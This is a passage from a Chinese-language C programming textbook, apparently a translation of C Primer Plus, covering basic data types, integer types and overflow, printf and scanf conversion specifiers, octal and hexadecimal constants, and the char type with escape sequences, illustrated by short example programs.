假设白金的价格是每盎司$1700     */ /* 14.5833用于把英镑常衡盎司转换为金衡盎司[1]*/ value = 1700.0 * weight * 14.5833; 110 printf("Your weight in platinum is worth $%.2f.\n", value); printf("You are easily worth that! If platinum prices drop,\n"); printf("eat more to maintain your value.\n"); return 0; } 提示 错误与警告 如果输入程序时打错(如,漏了一个分号),编译器会报告语法错误消 息。然而,即使输入正确无误,编译器也可能给出一些警告,如“警告:从 double类型转换成float类型可能会丢失数据”。错误消息表明程序中有错,不 能进行编译。而警告则表明,尽管编写的代码有效,但可能不是程序员想要 的。警告并不终止编译。特殊的警告与C如何处理1700.0这样的值有关。本 例不必理会这个问题,本章稍后会进一步说明。 输入该程序时,可以把1700.0改成贵金属白金当前的市价,但是不要改 动14.5833,该数是1英镑的金衡盎司数(金衡盎司用于衡量贵金属,而英镑 常衡盎司用于衡量人的体重)。 注意,“enter your weight”的意思是输入你的体重,然后按下Enter或 Return键(不要键入体重后就一直等着)。按下Enter键是告知计算机,你已 完成输入数据。该程序需要你输入一个数字(如,155),而不是单词 (如,too much)。如果输入字母而不是数字,会导致程序出问题。这个问 题要用if语句来解决(详见第7章),因此请先输入数字。下面是程序的输 出示例: Are you worth your weight in platinum? Let's check it out. Please enter your weight in pounds: 156 111 Your weight in platinum is worth $3867491.25. You are easily worth that! If platinum prices drop, eat more to maintain your value. 
程序调整 即使用第2章介绍的方法,在程序中添加下面一行代码: getchar(); 程序的输出是否依旧在屏幕上一闪而过?本例,需要调用两次getchar() 函数: getchar(); getchar(); getchar()函数读取下一个输入字符,因此程序会等待用户输入。在这种 情况下,键入 156 并按下Enter(或Return)键(发送一个换行符),然后 scanf()读取键入的数字,第1个getchar()读取换行符,第2个getchar()让程序暂 停,等待输入。 3.1.1 程序中的新元素 程序清单3.1中包含C语言的一些新元素。 注意,代码中使用了一种新的变量声明。前面的例子中只使用了整数类 型的变量(int),但是本例使用了浮点数类型(float)的变量,以便处理更 大范围的数据。float 类型可以储存带小数的数字。 程序中演示了常量的几种新写法。现在可以使用带小数点的数了。 为了打印新类型的变量,在printf()中使用%f来处理浮点值。%.2f中的.2 用于精确控制输出,指定输出的浮点数只显示小数点后面两位。 112 scanf()函数用于读取键盘的输入。%f说明scanf()要读取用户从键盘输入 的浮点数,&weight告诉 scanf()把输入的值赋给名为 weight 的变量。scanf() 函数使用&符号表明找到 weight变量的地点。下一章将详细讨论&。就目前 而言,请按照这样写。 也许本程序最突出的新特点是它的交互性。计算机向用户询问信息,然 后用户输入数字。与非交互式程序相比,交互式程序用起来更有趣。更重要 的是,交互式使得程序更加灵活。例如,示例程序可以使用任何合理的体 重,而不只是 156磅。不必重写程序,就可以根据不同体重进行计算。 scanf()和printf()函数用于实现这种交互。scanf()函数读取用户从键盘输入的 数据,并把数据传递给程序;printf()函数读取程序中的数据,并把数据显示 在屏幕上。把两个函数结合起来,就可以建立人机双向通信(见图 3.1), 这让使用计算机更加饶有趣味。 图3.1 程序中的scanf()和printf()函数 本章着重解释上述新特性中的前两项:各种数据类型的变量和常量。第 4章将介绍后3项。 113 3.2 变量与常量数据 在程序的指导下,计算机可以做许多事情,如数值计算、名字排序、执 行语言或视频命令、计算彗星轨道、准备邮件列表、拨电话号码、画画、做 决策或其他你能想到的事情。要完成这些任务,程序需要使用数据,即承载 信息的数字和字符。有些数据类型在程序使用之前已经预先设定好了,在整 个程序的运行过程中没有变化,这些称为常量(constant)。其他数据类型 在程序运行期间可能会改变或被赋值,这些称为变量(variable)。在示例 程序中,weight 是一个变量,14.5833 是一个常量。那么,1700.0 是常量还 是变量?在现实生活中,白金的价格不会是常量,但是在程序中,像1700.0 这样的价格被视为常量。 114 3.3 数据:数据类型关键字 不仅变量和常量不同,不同的数据类型之间也有差异。一些数据类型表 示数字,一些数据类型表示字母(更普遍地说是字符)。C通过识别一些基 本的数据类型来区分和使用这些不同的数据类型。如果数据是常量,编译器 一般通过用户书写的形式来识别类型(如,42是整数,42.100是浮点数)。 但是,对变量而言,要在声明时指定其类型。稍后会详细介绍如何声明变 量。现在,我们先来了解一下 C语言的基本类型关键字。K&C给出了7个与 类型相关的关键字。C90标准添加了2个关键字,C99标准又添加了3个关键 字(见表3.1)。 表3.1 C语言的数据类型关键字 在C语言中,用int关键字来表示基本的整数类型。后3个关键字(long、 short和unsigned)和C90新增的signed用于提供基本整数类型的变式,例如 unsigned short int和long long int。char关键字用于指定字母和其他字符(如, #、$、%和*)。另外,char类型也可以表示较小的整数。float、double和 long double表示带小数点的数。_Bool类型表示布尔值(true或false), _complex和_Imaginary分别表示复数和虚数。 通过这些关键字创建的类型,按计算机的储存方式可分为两大基本类 型:整数类型和浮点数类型。 位、字节和字 位、字节和字是描述计算机数据单元或存储单元的术语。这里主要指存 115 储单元。 最小的存储单元是位(bit),可以储存0或1(或者说,位用于设 置“开”或“关”)。虽然1位储存的信息有限,但是计算机中位的数量十分庞 大。位是计算机内存的基本构建块。 字节(byte)是常用的计算机存储单位。对于几乎所有的机器,1字节 均为8位。这是字节的标准定义,至少在衡量存储单位时是这样(但是,C 语言对此有不同的定义,请参阅本章3.4.3节)。既然1位可以表示0或1,那 么8位字节就有256(2的8次方)种可能的0、1的组合。通过二进制编码(仅 用0和1便可表示数字),便可表示0~255的整数或一组字符(第15章将详细 讨论二进制编码,如果感兴趣可以现在浏览一下该章的内容)。 字(word)是设计计算机时给定的自然存储单位。对于8位的微型计算 机(如,最初的苹果机), 1个字长只有8位。从那以后,个人计算机字长 增至16位、32位,直到目前的64位。计算机的字长越大,其数据转移越快, 允许的内存访问也更多。 3.3.1 整数和浮点数 整数类型?浮点数类型?如果觉得这些术语非常陌生,别担心,下面先 简述它们的含义。如果不熟悉位、字节和字的概念,请阅读上面方框中的内 容。刚开始学习时,不必了解所有的细节,就像学习开车之前不必详细了解 汽车内部引擎的原理一样。但是,了解一些计算机或汽车引擎内部的原理会 对你有所帮助。 对我们而言,整数和浮点数的区别是它们的书写方式不同。对计算机而 言,它们的区别是储存方式不同。下面详细介绍整数和浮点数。 3.3.2 整数 和数学的概念一样,在C语言中,整数是没有小数部分的数。例如, 2、−23和2456都是整数。而3.14、0.22和2.000都不是整数。计算机以二进制 116 数字储存整数,例如,整数7以二进制写是111。因此,要在8位字节中储存 该数字,需要把前5位都设置成0,后3位设置成1(如图3.2所示)。 图3.2 使用二进制编码储存整数7 3.3.3 浮点数 浮点数与数学中实数的概念差不多。2.75、3.16E7、7.00 和 2e-8 都是浮 点数。注意,在一个值后面加上一个小数点,该值就成为一个浮点值。所 以,7是整数,7.00是浮点数。显然,书写浮点数有多种形式。稍后将详细 介绍e记数法,这里先做简要介绍:3.16E7 表示3.16×107(3.16 乘以10 的7次 方)。其中, 107=10000000,7被称为10的指数。 这里关键要理解浮点数和整数的储存方案不同。计算机把浮点数分成小 数部分和指数部分来表示,而且分开储存这两部分。因此,虽然7.00和7在 数值上相同,但是它们的储存方式不同。在十进制下,可以把7.0写成 0.7E1。这里,0.7是小数部分,1是指数部分。图3.3演示了一个储存浮点数 的例子。当然,计算机在内部使用二进制和2的幂进行储存,而不是10的 幂。第15章将详述相关内容。现在,我们着重讲解这两种类型的实际区别。 整数没有小数部分,浮点数有小数部分。 浮点数可以表示的范围比整数大。参见本章末的表3.3。 对于一些算术运算(如,两个很大的数相减),浮点数损失的精度更 117 多。 图3.3 以浮点格式(十进制)储存π的值 因为在任何区间内(如,1.0 到 2.0 之间)都存在无穷多个实数,所以 计算机的浮点数不能表示区间内所有的值。浮点数通常只是实际值的近似 值。例如,7.0可能被储存为浮点值6.99999。稍后会讨论更多精度方面的内 容。 过去,浮点运算比整数运算慢。不过,现在许多CPU都包含浮点处理 器,缩小了速度上的差距。 118 3.4 C语言基本数据类型 本节将详细节介绍C语言的基本数据类型,包括如何声明变量、如何表 示字面值常量(如,5或2.78),以及典型的用法。一些老式的C语言编译器 无法支持这里提到的所有类型,请查阅你使用的编译器文档,了解可以使用 哪些类型。 3.4.1 int类型 
C语言提供了许多整数类型,为什么一种类型不够用?因为 C语言让程 序员针对不同情况选择不同的类型。特别是,C语言中的整数类型可表示不 同的取值范围和正负值。一般情况使用int类型即可,但是为满足特定任务和 机器的要求,还可以选择其他类型。 int类型是有符号整型,即int类型的值必须是整数,可以是正整数、负整 数或零。其取值范围依计算机系统而异。一般而言,储存一个int要占用一个 机器字长。因此,早期的16位IBM PC兼容机使用16位来储存一个int值,其 取值范围(即int值的取值范围)是-32768~32767。目前的个人计算机一般 是32位,因此用32位储存一个int值。现在,个人计算机产业正逐步向着64位 处理器发展,自然能储存更大的整数。ISO C规定int的取值范围最小 为-32768~32767。一般而言,系统用一个特殊位的值表示有符号整数的正 负号。第15章将介绍常用的方法。 1.声明int变量 第2章中已经用int声明过基本整型变量。先写上int,然后写变量名,最 后加上一个分号。要声明多个变量,可以单独声明每个变量,也可在int后面 列出多个变量名,变量名之间用逗号分隔。下面都是有效的声明: int erns; int hogs, cows, goats; 119 可以分别在4条声明中声明各变量,也可以在一条声明中声明4个变量。 两种方法的效果相同,都为4个int大小的变量赋予名称并分配内存空间。 以上声明创建了变量,但是并没有给它们提供值。变量如何获得值?前 面介绍过在程序中获取值的两种途径。第1种途径是赋值: cows = 112; 第2种途径是,通过函数(如,scanf())获得值。接下来,我们着重介 绍第3种途径。 2.初始化变量 初始化(initialize)变量就是为变量赋一个初始值。在C语言中,初始 化可以直接在声明中完成。只需在变量名后面加上赋值运算符(=)和待赋 给变量的值即可。如下所示: int hogs = 21; int cows = 32, goats = 14; int dogs, cats = 94; /* 有效,但是这种格式很糟糕 */ 以上示例的最后一行,只初始化了cats,并未初始化dogs。这种写法很 容易让人误认为dogs也被初始化为94,所以最好不要把初始化的变量和未初 始化的变量放在同一条声明中。 简而言之,声明为变量创建和标记存储空间,并为其指定初始值(如图 3.4所示)。 120 图3.4 定义并初始化变量 3.int类型常量 上面示例中出现的整数(21、32、14和94)都是整型常量或整型字面 量。C语言把不含小数点和指数的数作为整数。因此,22和-44都是整型常 量,但是22.0和2.2E1则不是。C语言把大多数整型常量视为int类型,但是非 常大的整数除外。详见后面“long常量和long long常量”小节对long int类型的 讨论。 4.打印int值 可以使用printf()函数打印int类型的值。第2章中介绍过,%d指明了在一 行中打印整数的位置。%d称为转换说明,它指定了printf()应使用什么格式 来显示一个值。格式化字符串中的每个%d都与待打印变量列表中相应的int 值匹配。这个值可以是int类型的变量、int类型的常量或其他任何值为int类型 的表达式。作为程序员,要确保转换说明的数量与待打印值的数量相同,编 译器不会捕获这类型的错误。程序清单3.2演示了一个简单的程序,程序中 初始化了一个变量,并打印该变量的值、一个常量值和一个简单表达式的 值。另外,程序还演示了如果粗心犯错会导致什么结果。 程序清单3.2 print1.c程序 121 /* print1.c - 演示printf()的一些特性 */ #include <stdio.h> int main(void) { int ten = 10; int two = 2; printf("Doing it right: "); printf("%d minus %d is %d\n", ten, 2, ten - two); printf("Doing it wrong: "); printf("%d minus %d is %d\n", ten); // 遗漏2个参数 return 0; } 编译并运行该程序,输出如下: Doing it right: 10 minus 2 is 8 Doing it wrong: 10 minus 16 is 1650287143 在第一行输出中,第1个%d对应int类型变量ten;第2个%d对应int类型常 量2;第3个%d对应int类型表达式ten - two的值。在第二行输出中,第1个%d 对应ten的值,但是由于没有给后两个%d提供任何值,所以打印出的值是内 存中的任意值(读者在运行该程序时显示的这两个数值会与输出示例中的数 值不同,因为内存中储存的数据不同,而且编译器管理内存的位置也不 同)。 122 你可能会抱怨编译器为何不能捕获这种明显的错误,但实际上问题出在 printf()不寻常的设计。大部分函数都需要指定数目的参数,编译器会检查参 数的数目是否正确。但是,printf()函数的参数数目不定,可以有1个、2个、 3个或更多,编译器也爱莫能助。记住,使用printf()函数时,要确保转换说 明的数量与待打印值的数量相等。 5.八进制和十六进制 通常,C语言都假定整型常量是十进制数。然而,许多程序员很喜欢使 用八进制和十六进制数。因为8和16都是2的幂,而10却不是。显然,八进制 和十六进制记数系统在表达与计算机相关的值时很方便。例如,十进制数 65536经常出现在16位机中,用十六进制表示正好是10000。另外,十六进制 数的每一位的数恰好由4位二进制数表示。例如,十六进制数3是0011,十六 进制数5是0101。因此,十六进制数35的位组合(bit pattern)是00110101, 十六进制数53的位组合是01010011。这种对应关系使得十六进制和二进制的 转换非常方便。但是,计算机如何知道10000是十进制、十六进制还是二进 制?在C语言中,用特定的前缀表示使用哪种进制。0x或0X前缀表示十六进 制值,所以十进制数16表示成十六进制是0x10或0X10。与此类似,0前缀表 示八进制。例如,十进制数16表示成八进制是020。第15章将更全面地介绍 进制相关的内容。 要清楚,使用不同的进制数是为了方便,不会影响数被储存的方式。也 就是说,无论把数字写成16、020或0x10,储存该数的方式都相同,因为计 算机内部都以二进制进行编码。 6.显示八进制和十六进制 在C程序中,既可以使用和显示不同进制的数。不同的进制要使用不同 的转换说明。以十进制显示数字,使用%d;以八进制显示数字,使用%o; 以十六进制显示数字,使用%x。另外,要显示各进制数的前缀0、0x和0X, 必须分别使用%#o、%#x、%#X。程序清单3.3演示了一个小程序。回忆一 下,在某些集成开发环境(IDE)下编写的代码中插入getchar();语句,程序 123 在执行完毕后不会立即关闭执行窗口。 程序清单3.3 bases.c程序 /* bases.c--以十进制、八进制、十六进制打印十进制数100 */ #include <stdio.h> int main(void) { int x = 100; printf("dec = %d; octal = %o; hex = %x\n", x, x, x); printf("dec = %d; octal = %#o; hex = %#x\n", x, x, x); return 0; } 编译并运行该程序,输出如下: dec = 100; octal = 144; hex = 64 dec = 100; octal = 0144; hex = 0x64 该程序以3种不同记数系统显示同一个值。printf()函数做了相应的转 换。注意,如果要在八进制和十六进制值前显示0和0x前缀,要分别在转换 说明中加入#。 3.4.2 其他整数类型 初学C语言时,int类型应该能满足大多数程序的整数类型需求。尽管如 此,还应了解一下整型的其他形式。当然,也可以略过本节跳至3.4.3节阅读 124 char类型的相关内容,以后有需要时再阅读本节。 C语言提供3个附属关键字修饰基本整数类型:short、long和unsigned。 应记住以下几点。 short 
int类型(或者简写为short)占用的存储空间可能比int类型少,常 用于较小数值的场合以节省空间。与int类似,short是有符号类型。 long int或long占用的存储空间可能比int多,适用于较大数值的场合。与 int类似,long是有符号类型。 long long int或long long(C99标准加入)占用的储存空间可能比long多, 适用于更大数值的场合。该类型至少占64位。与int类似,long long是有符号 类型。 unsigned int或unsigned只用于非负值的场合。这种类型与有符号类型表 示的范围不同。例如,16位unsigned int允许的取值范围是0~65535,而不 是-32768~32767。用于表示正负号的位现在用于表示另一个二进制位,所 以无符号整型可以表示更大的数。 在C90标准中,添加了unsigned long int或unsigned long和unsigned int或 unsigned short类型。C99标准又添加了unsigned long long int或unsigned long long。 在任何有符号类型前面添加关键字signed,可强调使用有符号类型的意 图。例如,short、short int、signed short、signed short int都表示同一种类型。 1.声明其他整数类型 其他整数类型的声明方式与int类型相同,下面列出了一些例子。不是所 有的C编译器都能识别最后3条声明,最后一个例子所有的类型是C99标准新 增的。 long int estine; 125 long johns; short int erns; short ribs; unsigned int s_count; unsigned players; unsigned long headcount; unsigned short yesvotes; long long ago; 2.使用多种整数类型的原因 为什么说short类型“可能”比int类型占用的空间少,long类型“可能”比int 类型占用的空间多?因为C语言只规定了short占用的存储空间不能多于int, long占用的存储空间不能少于int。这样规定是为了适应不同的机器。例如, 过去的一台运行Windows 3的机器上,int类型和short类型都占16位,long类 型占32位。后来,Windows和苹果系统都使用16位储存short类型,32位储存 int类型和long类型(使用32位可以表示的整数数值超过20亿)。现在,计算 机普遍使用64位处理器,为了储存64位的整数,才引入了long long类型。 现在,个人计算机上最常见的设置是,long long占64位,long占32位, short占16位,int占16位或32位(依计算机的自然字长而定)。原则上,这4 种类型代表4种不同的大小,但是在实际使用中,有些类型之间通常有重 叠。 C 标准对基本数据类型只规定了允许的最小大小。对于 16 位机,short 和 int 的最小取值范围是[−32767,32767];对于32位机,long的最小取值范围 是[−2147483647,2147483647]。对于unsigned short和unsigned int,最小取值范 围是[0,65535];对于unsigned long,最小取值范围是[0,4294967295]。long 126 long类型是为了支持64位的需求,最小取值范围是 [−9223372036854775807,9223372036854775807];unsigned long long的最小取 值范围是[0,18446744073709551615]。如果要开支票,这个数是一千八百亿 亿(兆)六千七百四十四万亿零七百三十七亿零九百五十五万一千六百一十 五。但是,谁会去数? int类型那么多,应该如何选择?首先,考虑unsigned类型。这种类型的 数常用于计数,因为计数不用负数。而且,unsigned类型可以表示更大的正 数。 如果一个数超出了int类型的取值范围,且在long类型的取值范围内时, 使用long类型。然而,对于那些long占用的空间比int大的系统,使用long类 型会减慢运算速度。因此,如非必要,请不要使用long类型。另外要注意一 点:如果在long类型和int类型占用空间相同的机器上编写代码,当确实需要 32位的整数时,应使用long类型而不是int类型,以便把程序移植到16位机后 仍然可以正常工作。类似地,如果确实需要64位的整数,应使用long long类 型。 如果在int设置为32位的系统中要使用16位的值,应使用short类型以节省 存储空间。通常,只有当程序使用相对于系统可用内存较大的整型数组时, 才需要重点考虑节省空间的问题。使用short类型的另一个原因是,计算机中 某些组件使用的硬件寄存器是16位。 3.long常量和long long常量 通常,程序代码中使用的数字(如,2345)都被储存为int类型。如果使 用1000000这样的大数字,超出了int类型能表示的范围,编译器会将其视为 long int类型(假设这种类型可以表示该数字)。如果数字超出long可表示的 最大值,编译器则将其视为unsigned long类型。如果还不够大,编译器则将 其视为long long或unsigned long long类型(前提是编译器能识别这些类型)。 八进制和十六进制常量被视为int类型。如果值太大,编译器会尝试使用 unsigned int。如果还不够大,编译器会依次使用long、unsigned long、long 127 long和unsigned long long类型。 有些情况下,需要编译器以long类型储存一个小数字。例如,编程时要 显式使用IBM PC上的内存地址时。另外,一些C标准函数也要求使用long类 型的值。要把一个较小的常量作为long类型对待,可以在值的末尾加上l(小 写的L)或L后缀。使用L后缀更好,因为l看上去和数字1很像。因此,在int 为16位、long为32位的系统中,会把7作为16位储存,把7L作为32位储存。l 或L后缀也可用于八进制和十六进制整数,如020L和0x10L。 类似地,在支持long long类型的系统中,也可以使用ll或LL后缀来表示 long long类型的值,如3LL。另外,u或U后缀表示unsigned long long,如 5ull、10LLU、6LLU或9Ull。 整数溢出 如果整数超出了相应类型的取值范围会怎样?下面分别将有符号类型和 无符号类型的整数设置为比最大值略大,看看会发生什么(printf()函数使 用%u说明显示unsigned int类型的值)。 /* toobig.c-- 超出系统允许的最大int值*/ #include <stdio.h> int main(void) { int i = 2147483647; unsigned int j = 4294967295; printf("%d %d %d\n", i, i+1, i+2); printf("%u %u %u\n", j, j+1, j+2); 128 return 0; } 在我们的系统下输出的结果是: 2147483647   -2147483648  -2147483647 4294967295   0   1 可以把无符号整数j看作是汽车的里程表。当达到它能表示的最大值 时,会重新从起始点开始。整数 i 也是类似的情况。它们主要的区别是,在 超过最大值时,unsigned int 类型的变量 j 从 0开始;而int类型的变量i则从 −2147483648开始。注意,当i超出(溢出)其相应类型所能表示的最大值 时,系统并未通知用户。因此,在编程时必须自己注意这类问题。 溢出行为是未定义的行为,C 标准并未定义有符号类型的溢出规则。以 上描述的溢出行为比较有代表性,但是也可能会出现其他情况。 4.打印short、long、long long和unsigned类型 打印unsigned int类型的值,使用%u转换说明;打印long类型的值,使 用%ld转换说明。如果系统中int和long的大小相同,使用%d就行。但是,这 样的程序被移植到其他系统(int和long类型的大小不同)中会无法正常工 
作。在x和o前面可以使用l前缀,%lx表示以十六进制格式打印long类型整 数,%lo表示以八进制格式打印long类型整数。注意,虽然C允许使用大写或 小写的常量后缀,但是在转换说明中只能用小写。 C语言有多种printf()格式。对于short类型,可以使用h前缀。%hd表示以 十进制显示short类型的整数,%ho表示以八进制显示short类型的整数。h和l 前缀都可以和u一起使用,用于表示无符号类型。例如,%lu表示打印 unsigned long类型的值。程序清单3.4演示了一些例子。对于支持long long类 型的系统,%lld和%llu分别表示有符号和无符号类型。第4章将详细介绍转 换说明。 129 程序清单3.4 print2.c程序 /* print2.c--更多printf()的特性 */ #include <stdio.h> int main(void) { unsigned int un = 3000000000; /* int为32位和short为16位的系统 */ short end = 200; long big = 65537; long long verybig = 12345678908642; printf("un = %u and not %d\n", un, un); printf("end = %hd and %d\n", end, end); printf("big = %ld and not %hd\n", big, big); printf("verybig= %lld and not %ld\n", verybig, verybig); return 0; } 在特定的系统中输出如下(输出的结果可能不同): un = 3000000000 and not -1294967296 end = 200 and 200 big = 65537 and not 1 130 verybig= 12345678908642 and not 1942899938 该例表明,使用错误的转换说明会得到意想不到的结果。第 1 行输出, 对于无符号变量 un,使用%d会生成负值!其原因是,无符号值 3000000000 和有符号值−129496296 在系统内存中的内部表示完全相同(详见第15 章)。因此,如果告诉printf()该数是无符号数,它打印一个值;如果告诉它 该数是有符号数,它将打印另一个值。在待打印的值大于有符号值的最大值 时,会发生这种情况。对于较小的正数(如96),有符号和无符号类型的存 储、显示都相同。 第2行输出,对于short类型的变量end,在printf()中无论指定以short类型 (%hd)还是int类型(%d)打印,打印出来的值都相同。这是因为在给函 数传递参数时,C编译器把short类型的值自动转换成int类型的值。你可能会 提出疑问:为什么要进行转换?h修饰符有什么用?第1个问题的答案是, int类型被认为是计算机处理整数类型时最高效的类型。因此,在short和int类 型的大小不同的计算机中,用int类型的参数传递速度更快。第2个问题的答 案是,使用h修饰符可以显示较大整数被截断成 short 类型值的情况。第 3 行 输出就演示了这种情况。把 65537 以二进制格式写成一个 32 位数是 00000000000000010000000000000001。使用%hd,printf()只会查看后 16 位,所以显示的值是 1。与此类似,输出的最后一行先显示了verybig的完整 值,然后由于使用了%ld,printf()只显示了储存在后32位的值。 本章前面介绍过,程序员必须确保转换说明的数量和待打印值的数量相 同。以上内容也提醒读者,程序员还必须根据待打印值的类型使用正确的转 换说明。 提示 匹配printf()说明符的类型 在使用 printf()函数时,切记检查每个待打印值都有对应的转换说明, 还要检查转换说明的类型是否与待打印值的类型相匹配。 3.4.3 使用字符:char类型 131 char类型用于储存字符(如,字母或标点符号),但是从技术层面看, char是整数类型。因为char类型实际上储存的是整数而不是字符。计算机使 用数字编码来处理字符,即用特定的整数表示特定的字符。美国最常用的编 码是ASCII编码,本书也使用此编码。例如,在ASCII码中,整数65代表大写 字母A。因此,储存字母A实际上储存的是整数65(许多IBM的大型主机使 用另一种编码——EBCDIC,其原理相同。另外,其他国家的计算机系统可 能使用完全不同的编码)。 标准ASCII码的范围是0~127,只需7位二进制数即可表示。通常,char 类型被定义为8位的存储单元,因此容纳标准ASCII码绰绰有余。许多其他系 统(如IMB PC和苹果Macs)还提供扩展ASCII码,也在8位的表示范围之 内。一般而言,C语言会保证char类型足够大,以储存系统(实现C语言的系 统)的基本字符集。 许多字符集都超过了127,甚至多于255。例如,日本汉字(kanji)字符 集。商用的统一码(Unicode)创建了一个能表示世界范围内多种字符集的 系统,目前包含的字符已超过110000个。国际标准化组织(ISO)和国际电 工技术委员会(IEC)为字符集开发了ISO/IEC 10646标准。统一码标准也与 ISO/IEC 10646标准兼容。 C语言把1字节定义为char类型占用的位(bit)数,因此无论是16位还是 32位系统,都可以使用char类型。 1.声明char类型变量 char类型变量的声明方式与其他类型变量的声明方式相同。下面是一些 例子: char response; char itable, latan; 以上声明创建了3个char类型的变量:response、itable和latan。 132 2.字符常量和初始化 如果要把一个字符常量初始化为字母 A,不必背下 ASCII 码,用计算机 语言很容易做到。通过以下初始化把字母A赋给grade即可: char grade = 'A'; 在C语言中,用单引号括起来的单个字符被称为字符常量(character constant)。编译器一发现'A',就会将其转换成相应的代码值。单引号必不 可少。下面还有一些其他的例子: char broiled;   /* 声明一个char类型的变量 */ broiled = 'T';  /* 为其赋值,正确 */ broiled = T;   /* 错误!此时T是一个变量 */ broiled = "T";  /* 错误!此时"T"是一个字符串 */ 如上所示,如果省略单引号,编译器认为T是一个变量名;如果把T用 双引号括起来,编译器则认为"T"是一个字符串。字符串的内容将在第4章中 介绍。 实际上,字符是以数值形式储存的,所以也可使用数字代码值来赋值: char grade = 65; /* 对于ASCII,这样做没问题,但这是一种不好的编程 风格 */ 在本例中,虽然65是int类型,但是它在char类型能表示的范围内,所以 将其赋值给grade没问题。由于65是字母A对应的ASCII码,因此本例是把A 赋给grade。注意,能这样做的前提是系统使用ASCII码。其实,用'A'代替65 才是较为妥当的做法,这样在任何系统中都不会出问题。因此,最好使用字 符常量,而不是数字代码值。 奇怪的是,C语言将字符常量视为int类型而非char类型。例如,在int为 133 32位、char为8位的ASCII系统中,有下面的代码: char grade = 'B'; 本来'B'对应的数值66储存在32位的存储单元中,现在却可以储存在8位 的存储单元中(grade)。利用字符常量的这种特性,可以定义一个字符常 量'FATE',即把4个独立的8位ASCII码储存在一个32位存储单元中。如果把 这样的字符常量赋给char类型变量grade,只有最后8位有效。因此,grade的 值是'E'。 3.非打印字符 单引号只适用于字符、数字和标点符号,浏览ASCII表会发现,有些 ASCII字符打印不出来。例如,一些代表行为的字符(如,退格、换行、终 端响铃或蜂鸣)。C语言提供了3种方法表示这些字符。 第1种方法前面介绍过——使用ASCII码。例如,蜂鸣字符的ASCII值是 7,因此可以这样写: char beep = 7; 第 2 
种方法是,使用特殊的符号序列表示一些特殊的字符。这些符号序 列叫作转义序列(escape sequence)。表3.2列出了转义序列及其含义。 把转义序列赋给字符变量时,必须用单引号把转义序列括起来。例如, 假设有下面一行代码: char nerf = '\n'; 稍后打印变量nerf的效果是,在打印机或屏幕上另起一行。 表3.2 转义序列 134 现在,我们来仔细分析一下转义序列。使用C90新增的警报字符(\a) 是否能产生听到或看到的警报,取决于计算机的硬件,蜂鸣是最常见的警报 (在一些系统中,警报字符不起作用)。C标准规定警报字符不得改变活跃 位置。标准中的活跃位置(active position)指的是显示设备(屏幕、电传打 字机、打印机等)中下一个字符将出现的位置。简而言之,平时常说的屏幕 光标位置就是活跃位置。在程序中把警报字符输出在屏幕上的效果是,发出 一声蜂鸣,但不会移动屏幕光标。 接下来的转义字符\b、\f、\n、\r、\t和\v是常用的输出设备控制字符。了 解它们最好的方式是查看它们对活跃位置的影响。换页符(\f)把活跃位置 移至下一页的开始处;换行符(\n)把活跃位置移至下一行的开始处;回车 符(\r)把活跃位置移动到当前行的开始处;水平制表符(\t)将活跃位置 移至下一个水平制表点(通常是第1个、第9个、第17个、第25个等字符位 置);垂直制表符(\v)把活跃位置移至下一个垂直制表点。 这些转义序列字符不一定在所有的显示设备上都起作用。例如,换页符 和垂直制表符在PC屏幕上会生成奇怪的符号,光标并不会移动。只有将其 输出到打印机上时才会产生前面描述的效果。 接下来的3个转义序列(\\、\'、\")用于打印\、'、"字符(由于这些字符 135 用于定义字符常量,是printf()函数的一部分,若直接使用它们会造成混 乱)。如果打印下面一行内容: Gramps sez, "a \ is a backslash." 应这样编写代码: printf("Gramps sez, \"a \\ is a backslash.\"\n"); 表3.2中的最后两个转义序列(\0oo和\xhh)是ASCII码的特殊表示。如 果要用八进制ASCII码表示一个字符,可以在编码值前面加一个反斜杠(\) 并用单引号括起来。例如,如果编译器不识别警报字符(\a),可以使用 ASCII码来代替: beep = '\007'; 可以省略前面的 0,'\07'甚至'\7'都可以。即使没有前缀 0,编译器在处 理这种写法时,仍会解释为八进制。 从C90开始,不仅可以用十进制、八进制形式表示字符常量,C语言还 提供了第3种选择——用十六进制形式表示字符常量,即反斜杠后面跟一个x 或X,再加上1~3位十六进制数字。例如,Ctrl+P字符的ASCII十六进制码是 10(相当于十进制的16),可表示为'\x10'或'\x010'。图3.5列出了一些整数类 型的不同进制形式。 136 图3.5 int系列类型的常量写法示例 使用ASCII码时,注意数字和数字字符的区别。例如,字符4对应的 ASCII码是52。'4'表示字符4,而不是数值4。 关于转义序列,读者可能有下面3个问题。 上面最后一个例子(printf("Gramps sez, \"a \\ is a backslash\"\"n"),为何 没有用单引号把转义序列括起来?无论是普通字符还是转义序列,只要是双 引号括起来的字符集合,就无需用单引号括起来。双引号中的字符集合叫作 字符串(详见第4章)。注意,该例中的其他字符(G、r、a、m、p、s等) 都没有用单引号括起来。与此类似,printf("Hello!\007\n");将打印Hello!并发 出一声蜂鸣,而 printf("Hello!7\n");则打印 Hello!7。不是转义序列中的数字 将作为普通字符被打印出来。 何时使用ASCII码?何时使用转义序列?如果要在转义序列(假设使 用'\f')和ASCII码('\014')之间选择,请选择前者(即'\f')。这样的写法不 仅更好记,而且可移植性更高。'\f'在不使用ASCII码的系统中,仍然有效。 137 如果要使用ASCII码,为何要写成'\032'而不是032?首先,'\032'能更清 晰地表达程序员使用字符编码的意图。其次,类似\032这样的转义序列可以 嵌入C的字符串中,如printf("Hello!\007\n");中就嵌入了\007。 4.打印字符 printf()函数用%c指明待打印的字符。前面介绍过,一个字符变量实际 上被储存为1字节的整数值。因此,如果用%d转换说明打印 char类型变量的 值,打印的是一个整数。而%c转换说明告诉printf()打印该整数值对应的字 符。程序清单3.5演示了打印char类型变量的两种方式。 程序清单3.5 charcode.c程序 /* charcode.c-显示字符的代码编号 */ #include <stdio.h> int main(void) { char ch; printf("Please enter a character.\n"); scanf("%c", &ch); /* 用户输入字符 */ printf("The code for %c is %d.\n", ch, ch); return 0; } 运行该程序后,输出示例如下: Please enter a character. 138 C The code for C is 67. 
